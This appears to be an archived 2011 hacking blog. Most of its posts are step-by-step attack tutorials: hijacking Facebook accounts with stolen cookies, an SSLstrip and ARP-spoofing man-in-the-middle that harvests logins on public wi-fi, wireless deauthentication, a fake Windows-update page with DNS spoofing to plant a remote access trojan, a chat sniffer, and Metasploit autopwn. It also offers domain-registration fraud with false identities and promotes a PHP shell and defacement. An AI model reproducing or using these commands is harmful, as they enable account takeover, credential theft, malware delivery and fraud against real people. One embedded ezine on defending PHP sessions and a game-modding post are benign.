Sunday, July 24, 2011

Controlling facebook accounts [No Pasword][Non-Script Kiddie Tut]

Login to your Facebook account and sniff your cookie OR collect a few live Facebook Biscuit/s of your Target/s.

1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back older than FaceBook.COM's current SYSTIME.

2 ] Send a GET Request to www.facebook.com port 80 after calculating the required variables (below)

GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US

3 ] From the Response Obtained :
Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].

Calculating the new nctr[ct] :
Add +79 to Original Timestamp. Append 3 more digits to its end.

Calculating &oldest= :
Deduct 144556 from Original Timestamp.

Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other Post Request

Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other Post Request

Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request

Your login_x actually looks like
a:2:{s:5:"email";s:13:"you@youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged in the hex format.

4 ] Send a GET Request like below with the above calculated variables :

GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php

5 ] In the output :
Search for Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)

6 ] Generate a new POST Request with the above calculated new variables :

POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php

action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-EXPLAINED-In-POINT-3)375

7 ] Use the above variables to view any content with the appropriate GET / requests

8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)

[PHP]Php Shell R00TSH3ll[SHELL]

Hey guys I made my own php shell that any one can use plz do not edit otherwise in further version with huge improvments will be encrypted to base64.
heres link:
R00TSH3ll Beta 2 Build 3
311 KB.

Hijacking Facebook with cookies !!! (Multi-Platform)

Download to FBController
This is facebook controller v3.
Software Required:
FBControllerv3
Backtrack5 or Windows or other distros that have WINE (BT comes with WINE)
Mantra (Comes with BT5) otherwise goto: Mantra HOmepage
gedit / notepad
------------------------
Ok, start up mantra and go to facebook.com and goto your victims wall.
Goto firebug then to Firecookie and view the cookies.
Open up COOKIE text file and match cookies in mantra with COOKIE text file with victims information and save it when your finished.
then load up Command Prompt if your in Windows. If not goto WINE explorer and goto C:\Windows\System32\ and hit cmd.exe then it will WINE's command prompt that work just like windows goto the directory of fbcontrolller and use this synatx.
FBController COOKIE.txt then if its successfull then it will show multiple options to compromise facebooks account.
AGREEMENT:
By reading this tutorial and downloading the file your responsible not hini or author of these software.
~ This tutorial was written by HiniAes do not leech.

Wednesday, July 20, 2011

RankMyHack.com

Its good site for ranking hacks :)

Test Post from Mobile :)

Hacked By HiniAes

Tuesday, July 19, 2011

Tutorial How to Install Google Chrome on BT5 same as Ubuntu

Installing Google Chrome on Backtrack 5

Google Chrome can be installed in many ways, on Ubuntu 11.04. Here I’ll explain few simple methods. You can also install Chromium (almost similar to Google Chrome), it is available in Ubuntu Software Center or Synaptic Package Manager. Just follow the steps -
step #1 : Go to its official website and download the Debian Package. Google Chrome version 10.x.* is the latest one.
Download the Google Chrome for Backtrack5
step #2 : Open the saved file with Ubuntu Software Center (Right Click on the Package, then select Open With USC; click on install Button to proceed) or Use the dpkg command to install the package. To install from the command line, type the command given below and enter your login password to proceed.

dpkg -i google-chrome-stable_current_i386.deb

step #3 : That’s all.. No more steps.. Enjoy surfing with Chrome.
Here is one snapshot, how Google Chrome looks on BT5

Get Free Domain [Fraud + Knowledge]

On no account I would be held responsible of your act.

Requires:
1. Google Chrome (to translate) Download: http://6660e7e2.spam.com
2.e-mail address!

First, go to: http://1c2e4b4b.spam.com
Ok, now enter the domain you want

Select one of the available domain that you want

Click the Next button

Select a hosting package and click "Order Now"

Click next button

Now, you need to enter personal information! Of course, you will not do that unless you are idiot! You need to create a false identity, how? Follow these instructions! Go to: http://576d357f.spam.com and fill empty seats false data. In doing so, click generate!
And there complete the form false information!

Now you will be prompted to enter your name and number of accounts. You will not do that (unless you are retard) but you will add information from the previous step!

You will now see the details of the order!

Check the box that says "I have read the terms etc" and then click "close order"

And finally, it will ask you to confirm your order!

It is better to hack credit and then register a domain, but i will show you that maybe some other time ...

PS: Replace spam to link bucks (without space)
Have fun :D

How to make ANY email address

This page from Microsoft lets you use any email domain like fbi.gov, facebook.com, and admin.tk anything!!!!
https://accountservices.passport.net/reg.srf?fid=RegCredOnlyEASI&sl=1&vv=410&lc=1033

Go to that link there you go!!!

Monday, July 18, 2011

Heres my new deface page

http://pastehtml.com/view/b0vu9p3iz.html
20x.cc seems to be down :( cant upload there + i lost my rootshell
at beta 3 and build 3 only have beta 2 build 3

Wednesday, July 13, 2011

MITM

Ok first of all what you need to run this attack using the method i will show you:
-You need to be running a backtrack OS [3/4/R1]
-To be connected to a wireless network [Any form of encryption]
-Wireless traffic

And thats it! This is going to be a short but sweet tutorial!

**This guide is intended for the sole purpose of penetration testing only**

Running Backtrack
I think that there are other methods of performing this attack that don't depend on you running Backtrack, but since i am assuming that you have cracked a network running backtrack i don't see why this should be a problem. Also this method is very easy;]

First of all you need to be running a version of backtrack, for more information on how to do this, click the link to my WPA/WPA2 cracking tutorial at the top, that covers several methods of booting backtrack from all OS's.

Finding targets
Second of all You need to be connected to a wireless network with network traffic; this can basically be anywhere and any form of wireless network, if you are connected you can attack!

A good method of maximising the affect of this attack is to target wi-fi networks with as many clients as possible, preferably in a public place. Prime examples are unsecured networks in hotels, schools, offices, cafe's and any free public wi-fi spots. These are great as they don't require any cracking!

Optional

However if you have cracked a network, then you can use your wi-fi adapter that is capable of going into monitor mode to search for the best wi-fi network. The most common wi-fi adapter capable fo doing this is the ALFA AWUS036H, for more information and info on how to monitor wireless networks and spoof MAC addresses refer to my WPA/WPA2 cracking tutorial. This will allow you to better survey the area and choose a target network with the most clients.

Spoofing your MAC address
If you want to be safe then it is a good idea to spoof your MAC address, luckily for this attack you don't need a wireless card capable of packet injection any card should do fine =] This means that you only need to type the following into a terminal

Code:

ifconfig wlan0 down

macchanger -s wlan0

macchanger -m 00:11:22:33:44:55 wlan0

ifconfig wlan0 up

Where i have written wlan0 you will have to put the name of your wireless interface; however unless you have two wireless cards it is most probably "wlan0". If yu do have 2 wireless cards then you will know what to do ;]

The attack
This is the easy part! all you need to do is enter the following into a terminal

Code:

echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sslstrip -w passwords

This will forward all wi-fi traffic back to the client so no one gets suspicious. It will also create a document on your desktop called "passwords" leave this well alone for now. Another key part of this attack is SSLstrip, this allows you to steal the info from secure web pages. (Hotmail, Facebook, Gmail, Ebay etc...)

Now leave that terminal open and open a new one. Now we need to find out the name of the gateway that we will be redirecting traffic to. To do this simply type "route" into the terminal and wait for a minute.

You should see something like this:

As you can see from this the gate way that my wi-fi traffic is going through is called "BThomehub.Home"; and the interface connected is wlan1 We now use this info when entering the next command.

Side note: You can also use:

Code:

route -n | grep 'UG[ \t]' | awk '{print $2}'

To show the IP address of the router. This is much more reliable as sometimes the gateway can be cut off. This is also useful if you are using ettercap.

Code:

arpspoof -i <interface> <gateway>

This will commence the MITM attack the screen should look something like this:

Now leave both of the open terminals running, they are now capturing all of the data sent across the wi-fi. Have a coffee, do your homework, go to a meeting. The longer you leave it the higher chance you will have of catching something juicy!

Processing the data
You will now have a large text or html file on your desktop, these are your results, don't open them just yet. Protip: If you have a slow computer with a low amount of RAM don't leave your MITM attack running for too long or you could generate a text file too large for your computer to handle! Now close down your two terminals and open the text file in your favorite editor. I just use Kate advanced text editor; Which ever one you use it needs to have a search function.

I would upload some screen caps of me doing this but i don't have any one to target to generate the file =[ so sorry about that.

In Kate once you have opened the file press F3 [or just CTRL+F in another editor] to search through the document. In Kate you want to un-tick "case sensitive".

Now the fun bit! Search the document for the following:
password=
password
pass=
pass
username=
username
user=
user
email...

Be creative and think for others. Bascially keep searching through the document unitl you come across "username=Middle, password=i<3HF" then look above for the website they were on and walla you have acquired a login!

In under 2 hours in a hotel with unsecured wi-fi i got 10 logins: 2 Hotmail, 3 Facebook, 4 Gmail and one for "Gay.com" XD

Hope you enjoyed, please leave feedback =]

This attack also works for wired connections, to do this you need to change the interface you use to the interface that is connected to the wired network. To determine what this device is use the following.

Code:

ifconfig

Now just look for the interface that has the IP address and use that instead of wlan0. All credits go to ac1dxtrem for this protip =]

"Airbomb"

Airdrop-ng tutorial - Rule Based Deauth

This tutorial is based in backtrack4 and i'll assume you are competent with linux to the standard this tutorial requires. You must also have a packet injection/monitor mode supported wireless interface.

Capturing Your Surrounding's
First we need to capture the wireless activity in the area.

airmon-ng [to check the interface you will be using]
airmon-ng start wlan0 [starts the interface 'wlan0', change it accordingly]
airodump-ng mon0 -w capture --output-format csv ['mon0' is your interface in monitor mode, and csv is the output filetype of the captured information with a filename in this example of 'capture']

This step you can do previous to capturing the file if you have a specific target you know the MAC address of, but normally is done afterwards so you can review the output in the terminal of airodump-ng [last command above].

MAC Rules Info
We need to understand a basic formula for how the 'rules' work within airdrop-ng, a = allow whereas d = deny, I know rocket science isn't it lol. This is where it gets to the good bit. The format of each rule whether it's allow or deny access is allow(a) or deny(d) then bssid's MAC followed by the client's MAC. Below are example of how it would look.

Allow rule: a/bssid MAC ['any']|slave's MAC ['any']

Deny rule: d/bssid MAC ['any']|slave's MAC ['any']

However, you may wonder what the 'any' is for. Well if you decide you don't want anyone to connect to a bssid then you would put this for example:

d/00:11:22:33:44:55|any [00:11:22:33:44:55 being the bssid you wish to alienate]

To do the opposite and allow a MAC to not connect to anything:

d/any|00:11:22:33:44:55 [00:11:22:33:44:55 being in this example the client you wish to block.

Implementing MAC Rules
To put the rules in place we need to setup a 'rules' file which airdrop will read and implement the rules from. To add rules to the file we do so thus:

echo '#D' > rules && echo 'd/any|xy:xy:xy:xy:xy:xy' >> rules [this command will create the file 'rules' on your desktop and enter the above rule under the heading '#D']

The contents will look like this [remember i'm using D to remind you this is Deny!!
#D
d/any|xy:xy:xy:xy:xy:xy

Running Airdrop-ng
Installing Airdrop through synaptic is what i'll advise you to do as it places everything in the right place for you to follow this tutorial. Navigate using terminal to the airdrop directory:
cd /pentest/wireless/airdrop-ng/

Once there we start airdrop-ng:
airdrop-ng -i mon0 -t /capture.csv -r /rules [-i = interface, -t = capture file and -r = rules file. You can also run a rule debugging mode which is activated by using -b after rules e.g. airdrop-ng -i mon0 -t /capture.csv -r /rules -b]

We next have to understand a very important concept in the rules file reading process done by airdrop-ng. The program reads from top to bottom so allow rules applying to a specific MAC but come before deny rules applying to the same MAC. Using another example i'll demonstrate.

#D
d/xy:xy:xy:xy:xy:xy|any [we've now blocked all access to a AP/bssid, but then we decide we want a specific MAC only to connect to it. This must but done as shown below].

#A
a/xy:xy:xy:xy:xy:xy|yz:yz:yz:yz:yz:yz
#D
d/xy:xy:xy:xy:xy:xy|any

As you can see above our original rule of denying every connection to the AP is below the rule to grant/allow access to the one MAC/client. This must be done in this format!! To make alterations to the rules file use for following command:

nano rules [you can use other text editor's but I prefer nano, it's down to personal preference]

Note: alot of cases have been reported on a few forums of airdrop not responding to more than the 1st allow rule. So have one allow and the rest denials.

OUI [Organizationally Unique Identifier] Hardware names
Airdop also had the function to allow or deny based on the OUI and hardware names [but not to the same extent]. It is implmented in the same way as the MAC's, I won't be giving out a tutorial on this part because it's had hit and miss results and i've not personally tried it only the MAC deauth.
However, the OUI list is located below:
nano /pentest/wireless/airdrop-ng/support/oui.txt

To update the OUI list use:
airdrop-ng -u

How does this tutorial help you?
If you combine my other tutorial on SSL sniffing and SoftAP's with this, you could hijack someones AP, route traffic through your softAP using their connection, ban all access to the original AP and palm your AP off as the original using the airdrop-ng rule system.

Get your R.A.T onto a pc

This is how to get someone to download your rat if you're on the same network

This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering he same damn question over and over again..

Start by downloading backtrack 4 and burning the iso.

Code:

http://www.remote-exploit.org/backtrack_download.html

Boot into backtrack and open the file browser, and browse to /var/www/. There will be file called index.html.
Open it with kate (or some other text editor) delete the code that is in there and copy in the following code.

Code:

<body>

<p align="center" class="style2">Critical Vulnerability in Windows  XP, Vista, Windows 2000 detected. Download and installation of upgrade  required. </p>

<p align="center">

<input align="center" type="button" name="Button" value="Download  Update" onClick="window.open('/windowsupdate.exe', 'download'); return  false;">

</p>

<p align="center" class="style2"></p>

<p>&nbsp;</p>

<form id="form1" name="form1" method="post" action="/upgrade.exe">

<label for="D"></label>

</form>

<p align="left" class="style4">&nbsp;</p>

</body>

</html>

Now copy your rat into the same directory and name it windowsupdate.exe

Start apache

Code:

/etc/init.d/apache2 start

open firefox and navigate to 127.0.0.1. Your fake update page should show up.

Now set up the dns_spoofing configuraton

Code:

echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns

Replace 192.168.1.101 with your own ip (ifconfig)

Use nmap to find your target ip

Code:

nmap -sP your_subnet/24

Now arp-poison with ettercap using the dns_spoof plugin.

Code:

ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof

replace 192.168.1.102 with your target's ip.
replace 192.168.1.1 with your gateway ip.
replace wlan0 with your interface.

If you want to target everyone on the network you can use the following command.

Code:

ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ // -P dns_spoof

Now every time they try to navigate to a web page, they will be redirected to your update page.
Some people will be suspicious but after 5 min of not being able to browse, anyone will give in.

Once you get remote access stop ettercap right away and run the following command in the target computer's cmd.

Code:

ipconfig /flushdns

This will let them browse again.

Monday, July 11, 2011

Session Hijacking Basic[Ezine]

Session Hijacking Basic

__               _                      _  _            _    _             
/ _\ ___  ___ ___(_) ___  _ __     /\  /(_)(_) __ _  ___| | _(_)_ __   __ _ 
\ \ / _ \/ __/ __| |/ _ \| '_ \   / /_/ / || |/ _` |/ __| |/ / | '_ \ / _` |
_\ \  __/\__ \__ \ | (_) | | | | / __  /| || | (_| | (__|   <| | | | | (_| |
\__/\___||___/___/_|\___/|_| |_| \/ /_/ |_|/ |\__,_|\___|_|\_\_|_| |_|\__, |
                                         |__/                         |___/ 
             Basic

# language: English
# Title: Session Hijacking Basic
# Date: 2011-01-13
# Author: Filipe Barros/@barros_filipe 

| +01 - Session Fixation
| +02 - Session Hijacking
| +03 - Firesheep

Have fun :)

====== +01 - Session Fixation ======

The attacker attempts to gain access to another user's session by posing as that user.

The information for an attacker is the session identifier, because this is required for any impersonation attack. There are three common methods used to obtain a valid session identifier:

* Fixation

* Capture

* Prediction

Prediction refers to guessing a valid session identifier. With PHP's native session mechanism, the session identifier is extremely random, and this is unlikely to be the weakest point in your implementation.

Because session identifiers are typically propagated in cookies or as GET variables, the different approaches focus on attacking these methods of transfer. While there have been a few browser vulnerabilities regarding cookies, these have mostly been Internet Explorer, and cookies are slightly less exposed than GET variables. for those users who enable cookies, you can provide them with a more secure mechanism by using a cookie to propagate the session.

Fixation is the simplest method of obtaining a valid session identifier. While it's not very difficult to defend against, if your session mechanism consists of nothing more than session_start(), you are vulnerable.

To demonstrate session fixation, I'll use the following script, session-hijacking.php:

[ Begin PHP CODE ]

<?php

session_start();

if (!isset($_SESSION['visits']))
{
    $_SESSION['visits'] = 1;
}
else
{
    $_SESSION['visits']++;
}

echo $_SESSION['visits'];

?>

[ End PHP CODE ]

First make sure that you do not have an existing session identifier (perhaps delete your cookies), then visit this page with ?PHPSESSID=123456789 appended to the URL. Next, with a completely different browser (or even a completely different computer), visit the same URL again with ?PHPSESSID=123456789 appended. You will notice that you do not see 1 output on your first visit, but rather it continues the session you previously initiated.

If there isn't an active session associated with a session identifier that the user is presenting, then regenerate it just to be sure:

[ Begin PHP CODE ]

<?php

session_start();

if (!isset($_SESSION['initiated']))
{
    session_regenerate_id();
    $_SESSION['initiated'] = true;
}

?>

[ End PHP CODE ]

The problem with such a simplistic defense is that an attacker can simply initialize a session for a particular session identifier and then use that identifier to launch the attack.

====== +02 - Session Hijacking ======

If your session mechanism have only session_start(), you are vulnerable.

With the most simplistic session mechanism, a valid session identifier is all that is needed to successfully hijack a session. In order to improve this, we need to see if there is anything extra in an HTTP request that we can use for extra identification.

Recall a typical HTTP request:

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789
Only the Host header is required by HTTP/1.1, so it seems unwise to rely on anything else. However, consistency is really all we need, because we're only interested in complicating impersonation without adversely affecting legitimate users.

Imagine that the previous request is followed by a request with a different User-Agent:

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla Compatible (MSIE)
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789

Although the same cookie is presented, should it be assumed that this is the same user? It seems highly unlikely that a browser would change the User-Agent header between requests, right? Let's modify the session mechanism to perform an extra check:

[ Begin PHP CODE ]

<?php

session_start();

if (isset($_SESSION['HTTP_USER_AGENT']))
{
    if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
    {
        /* Prompt for password */
        exit;
    }
}
else
{
    $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
}

?>

[ End PHP CODE ]

Now an attacker must not only present a valid session identifier, but also the correct User-Agent header that is associated with the session. This complicates things slightly, and it is therefore a bit more secure.

Imagine if we required the user to pass the MD5 of the User-Agent in each request. An attacker could no longer just recreate the headers that the victim's requests contain, but it would also be necessary to pass this extra bit of information. While guessing the construction of this particular token isn't too difficult, we can complicate such guesswork by simply adding an extra bit of randomness to the way we construct the token:

<?php

$string = $_SERVER['HTTP_USER_AGENT'];
$string .= 'SHIFLETT';

/* Add any other data that is consistent */

$fingerprint = md5($string);

?>

Keeping in mind that we're passing the session identifier in a cookie, and this already requires that an attack be used to compromise this cookie (and likely all HTTP headers as well), we should pass this fingerprint as a URL variable. This must be in all URLs as if it were the session identifier, because both should be required in order for a session to be automatically continued (in addition to all checks passing).

In order to make sure that legitimate users aren't treated like criminals, simply prompt for a password if a check fails. If there is an error in your mechanism that incorrectly suspects a user of an impersonation attack, prompting for a password before continuing is the least offensive way to handle the situation. In fact, your users may appreciate the extra bit of protection perceived from such a query.

There are many different methods you can use to complicate impersonation and protect your applications from session hijacking. Hopefully you will at least do something in addition to session_start() as well as be able to come up with a few ideas of your own.

====== +03 - Firesheep ======

Recently a firefox extension called Firesheep has exploited and made it easy for public wifi users to be attacked by session hijackers. Websites like Facebook, Twitter, and any that the user adds to their preferences allow the firesheep user to easily access private information from cookies and threaten the public wifi users personal property.

Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.

Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.

Thanks!

:)

[Version 0.3] Facebook chat sniffer

I threw this together in class yesterday because facebook was kicking me out when i tried to session hijack.

Version 0.3 http://pastebin.com/qNGuK9ix

save to fbsniff.py, set permissions, copy to sbin

Code:

chmod 755 fbsniff.py

cp fbsniff.py /usr/sbin/fbsniff

start the sniffer

Code:

tshark -i <interface> -w out.cap

start fbsniff

Code:

fbsniff -c out.pcap -l

you can also run it with a basic message filters

Code:

fbsniff -c out.pcap -f "Keegan,Test"

start ettercap

Code:

ettercap -T -M arp -i <interface> // // -P autoadd

Friday, July 8, 2011

BT5 + Metasploit + postgresql (works for me)

i'm working in this mode :

root@bt:~# apt-get install postgresql
root@bt:~# sudo apt-get install libpgsql-ruby
root@bt:~# sudo su postgres
sh-4.1$ createuser root -P
could not change directory to "/root"
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
sh-4.1$ createdb --owner=root metasploit
could not change directory to "/root"
exit
sh-4.1$ exit
exit
root@bt:~# msfconsole
msf > db_driver postgresql[*] Using database driver postgresql
msf > db_connect root:toor@127.0.0.1:5432/metasploit
db_workspace -a MyProject
*] Added workspace: MyProject
msf > db_nmap 192.168.1.165 -sS -O[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-05-14 15:27 CEST[*] Nmap: Nmap scan report for hackdany-cecb3e.homenet.telecomitalia.it (192.168.1.165)[*] Nmap: Host is up (0.00055s latency).[*] Nmap: Not shown: 997 closed ports[*] Nmap: PORT STATE SERVICE[*] Nmap: 135/tcp open msrpc[*] Nmap: 139/tcp open netbios-ssn[*] Nmap: 445/tcp open microsoft-ds[*] Nmap: MAC Address: 08:00:27:F1:F2:8F (Cadmus Computer Systems)[*] Nmap: Device type: general purpose[*] Nmap: Running: Microsoft Windows XP[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3[*] Nmap: Network Distance: 1 hop[*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.56 seconds
msf > db_autopwn -p -e -q[*] (1/51 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.165:135...[*] (2/51 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.165:139...[*] (3/51 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.165:139...[*] (4/51 [0 sessions............................etc...etc...et c
the work is perfect (FOR ME)
bye

Thursday, July 7, 2011

Modding Golden Eye:rogue agent (concept of making halo)

Required Tools
Dslazy
TilEd 2002
sseq2mid
Kiwi Ds Editor
A Hex Editor

FIRST STEP

extract your clean rom (unedited) with dslazy

Now you will have folders and files like this:

NDS_EXTRACT
data
overlay
header.bin
y7.bin
y9.bin
arm7.bin
arm9.bin
banner.bin

Editing The Games Icons

go to the data folder, inside the data folder there are many other folders,
to get to the icons go to the folder icons (surprised?)
try to preview one... (it wont work)
they aren't in the average windows format,

to edit them use tiled2002

Using TilEd 2002
Open up TilEd 2002
now click the Browser button (where the file button normally is)
Then click Open
navigate to your icons
(dslazy/NDS_EXTRACT/data/icons)
they wont show up,
click where it says all compadible roms then click all files
then open up a icon (e.g DrNo.ico)
a jumble of random colors apears,
to fix this click SNES 4bb (see picture)

IMG

now you should get a picture like this image shows
IMG
to fix colors press buton indicated in previous picture.
(note this isn't the right pallette, could someone please make one?)

copy tiles to editer window then select paint mode
and edit in the editer window

(these arn't the virtual trainning icons... they are the ones that pop up when you have to verse "xenia onnatop" and other charachtors in campaighn.)

Text Editing
Objectives and stuff...
Editing Level Objectives Text
I will use Fort Knox as an Example
go to:
dslazy\NDS_UNPACK\data\Levels\1_0_FortKnox
open 1_0_Crash.txt with notepad
now type in the new message (in the same space as the old one)
(try to keep similar length, otherwise falls of screen)
(for more space delete the empty lines between text (but not above the text!))
also works on all the other txt files in the level folders

Editing In Game Text
Remember this txt from level 1?

CODE

YOUR PERSONAL SIDEARM, THE SPEC 9, IS CURRENTLY EQUIPPED IN YOUR RIGHT HAND. PRESS THE R BUTTON TO FIRE YOUR RIGHT HAND WEAPON...PRESS THE L BUTTON TO THROW GRENADES OR FIRE YOUR LEFT HAND WEAPON. YOUR GRENADES WILL BE HOLSTERED UNTIL YOU SWITCH BACK TO THEM BY DOUBLE TOUCHING THE LEFT WEAPON ICON.

OR Even

CODE

NUCLEAR DEVICE LOCATED! NOW DEFUSE IT!

its in Templates.Crt
open templates.crt in your hex editer then press CTR+F and search for the string you want (e.g "NUCLEAR DEVICE" or "YOUR PERSONAL" for guns just search for their names e.g "JACKAL")
edit to your every will (without adding extra hex bytes!), and thats a little more of this game hacked...

EXAMPLE IMAGES:
IMG1
IMG2
(You can edit some of this directly through the rom but it shows a message on boot up something like "Menus Edited Please Recompile")

Editing The Games Music/Sound
I'm not too sure about this but heres some info i got off the net

Extracting SDAT files
in dslazy/NDS_EXTRACT/data/Sounds there are some files (Sound_All.sdat ect)
open Kiwi Ds's Editor
then click File/open
navigate to dslazy/NDS_EXTRACT/data/Sounds
open file you want to extract,
it will then show upon the editor,
double click it.
this should bring up a new window, now select all.
then click extract selected.

Repacking SDAT files
open Kiwi Ds's Editor
then click Tools/Make SDAT
clck source files foledr (the ... button)
then navigate to the extracted files directory

Converting SSEQ to MIDI

copy SEQ_MUSIC0.sseq (exsample) to the sseq2mid-20070314\bin
create a new bat/batche file insert this code

CODE

sseq2mid.exe -1 SEQ_MUSIC0.sseq
pause

this will give you a MID file,

Converting MIDI to SSEQ
kiwids released a program called mid2sseq, (link)
will use soon

Model Swapping Data
incorrect model swapping will cause the game to freeze,

your guns are labeled like 'ar4_commando.nsbmd'
your enemys guns are labeled like 'npc_assault_rifle.nsbmd'

i will work on a model swapping compadability list...
(probably on my own site so i can work in html)
Swapping Jackal and spec9 works (animations work to : shoot and reload)
